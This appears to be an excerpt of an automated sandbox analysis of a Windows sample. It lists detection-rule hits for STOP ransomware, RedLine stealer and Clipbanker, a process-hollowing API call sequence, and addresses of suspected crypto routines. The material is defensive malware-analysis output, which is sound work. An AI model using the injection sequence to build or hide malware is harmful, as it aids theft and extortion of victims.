Source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000002.1752670364.0000000001ADE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.3032813684.0000000000A00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.1981826365.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2065451364.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.1804523922.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2065195987.000000000446D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001A.00000002.2386315733.0000000000820000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000003.00000002.1652876016.000000000441E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1628654696.0000000004264000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001F.00000002.3619170404.0000000000950000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.1660011852.0000000004577000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.1871352690.000000000084D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.1803890578.0000000004434000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 1020, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 2004, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 3260, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 7220, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	0_2_05E30110
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E50110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	3_2_05E50110
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	4_2_05DC0110

Detected potential crypto function

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_00404F7E	0_2_00404F7E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E33520	0_2_05E33520
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37520	0_2_05E37520
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E5D7F1	0_2_05E5D7F1
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3A79A	0_2_05E3A79A
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3C760	0_2_05E3C760
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3E6E0	0_2_05E3E6E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E7B69F	0_2_05E7B69F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3A699	0_2_05E3A699
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E5D1A4	0_2_05E5D1A4
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E7E141	0_2_05E7E141
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E39120	0_2_05E39120
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E370E0	0_2_05E370E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E330F0	0_2_05E330F0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E400D0	0_2_05E400D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3B0B0	0_2_05E3B0B0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3A026	0_2_05E3A026
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E4F030	0_2_05E4F030
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3B000	0_2_05E3B000
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37393	0_2_05E37393
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E7E37C	0_2_05E7E37C
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05EB22C0	0_2_05EB22C0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37220	0_2_05E37220
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E35DE7	0_2_05E35DE7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E35DF7	0_2_05E35DF7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E72D1E	0_2_05E72D1E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E64E9F	0_2_05E64E9F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E38E60	0_2_05E38E60
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E359F7	0_2_05E359F7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E389D0	0_2_05E389D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E5E9A3	0_2_05E5E9A3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E5F9B0	0_2_05E5F9B0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3A916	0_2_05E3A916
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E518D0	0_2_05E518D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37880	0_2_05E37880
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3DBE0	0_2_05E3DBE0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E32B60	0_2_05E32B60
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E40B00	0_2_05E40B00
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37A80	0_2_05E37A80
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3CA10	0_2_05E3CA10
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040D240	1_2_0040D240
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00419F90	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00405057	1_2_00405057
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040C070	1_2_0040C070
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0042E003	1_2_0042E003
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0042F010	1_2_0042F010
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00408030	1_2_00408030
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004070E0	1_2_004070E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00410160	1_2_00410160
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004C8113	1_2_004C8113
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004021C0	1_2_004021C0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004C9343	1_2_004C9343
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044237E	1_2_0044237E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00405447	1_2_00405447
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00405457	1_2_00405457
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004084C0	1_2_004084C0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004344FF	1_2_004344FF
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00449506	1_2_00449506
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044B5B1	1_2_0044B5B1
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040A660	1_2_0040A660
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00409686	1_2_00409686
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0041E690	1_2_0041E690
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00406740	1_2_00406740
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00402750	1_2_00402750
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040A710	1_2_0040A710
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040F730	1_2_0040F730
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00408780	1_2_00408780
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044D7A1	1_2_0044D7A1
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0042C804	1_2_0042C804
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00406880	1_2_00406880
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00481920	1_2_00481920
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044D9DC	1_2_0044D9DC
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004069F3	1_2_004069F3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00449A71	1_2_00449A71
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00443B40	1_2_00443B40
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00402B80	1_2_00402B80
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00406B80	1_2_00406B80
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00409CF9	1_2_00409CF9
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044ACFF	1_2_0044ACFF
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040DD40	1_2_0040DD40
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00427D6C	1_2_00427D6C
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040BDC0	1_2_0040BDC0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00409DFA	1_2_00409DFA
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0042CE51	1_2_0042CE51
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00406EE0	1_2_00406EE0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00409F76	1_2_00409F76
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00420F30	1_2_00420F30
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00449FE3	1_2_00449FE3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E53520	3_2_05E53520
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57520	3_2_05E57520
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E7D7F1	3_2_05E7D7F1
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5A79A	3_2_05E5A79A
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5C760	3_2_05E5C760
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5E6E0	3_2_05E5E6E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E9B69F	3_2_05E9B69F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5A699	3_2_05E5A699
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E7D1A4	3_2_05E7D1A4
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E9E141	3_2_05E9E141
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E59120	3_2_05E59120
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E570E0	3_2_05E570E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E530F0	3_2_05E530F0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E600D0	3_2_05E600D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5B0B0	3_2_05E5B0B0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5A026	3_2_05E5A026
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E6F030	3_2_05E6F030
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5B000	3_2_05E5B000
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57393	3_2_05E57393
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E9E37C	3_2_05E9E37C
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05ED22C0	3_2_05ED22C0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57220	3_2_05E57220
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E55DE7	3_2_05E55DE7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E55DF7	3_2_05E55DF7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E92D1E	3_2_05E92D1E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E84E9F	3_2_05E84E9F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E58E60	3_2_05E58E60
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E559F7	3_2_05E559F7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E589D0	3_2_05E589D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E7E9A3	3_2_05E7E9A3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E7F9B0	3_2_05E7F9B0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5A916	3_2_05E5A916
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E718D0	3_2_05E718D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57880	3_2_05E57880
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5DBE0	3_2_05E5DBE0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E52B60	3_2_05E52B60
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E60B00	3_2_05E60B00
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57A80	3_2_05E57A80
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5CA10	3_2_05E5CA10
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC3520	4_2_05DC3520
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7520	4_2_05DC7520
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DED7F1	4_2_05DED7F1
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCA79A	4_2_05DCA79A
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCC760	4_2_05DCC760
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCE6E0	4_2_05DCE6E0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCA699	4_2_05DCA699
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E0B69F	4_2_05E0B69F
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DED1A4	4_2_05DED1A4
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E0E141	4_2_05E0E141
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC9120	4_2_05DC9120
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DD00D0	4_2_05DD00D0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC30F0	4_2_05DC30F0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC70E0	4_2_05DC70E0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCB0B0	4_2_05DCB0B0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCB000	4_2_05DCB000
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DDF030	4_2_05DDF030
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCA026	4_2_05DCA026
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7393	4_2_05DC7393
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E0E37C	4_2_05E0E37C
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E422C0	4_2_05E422C0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7220	4_2_05DC7220
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC5DF7	4_2_05DC5DF7
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC5DE7	4_2_05DC5DE7
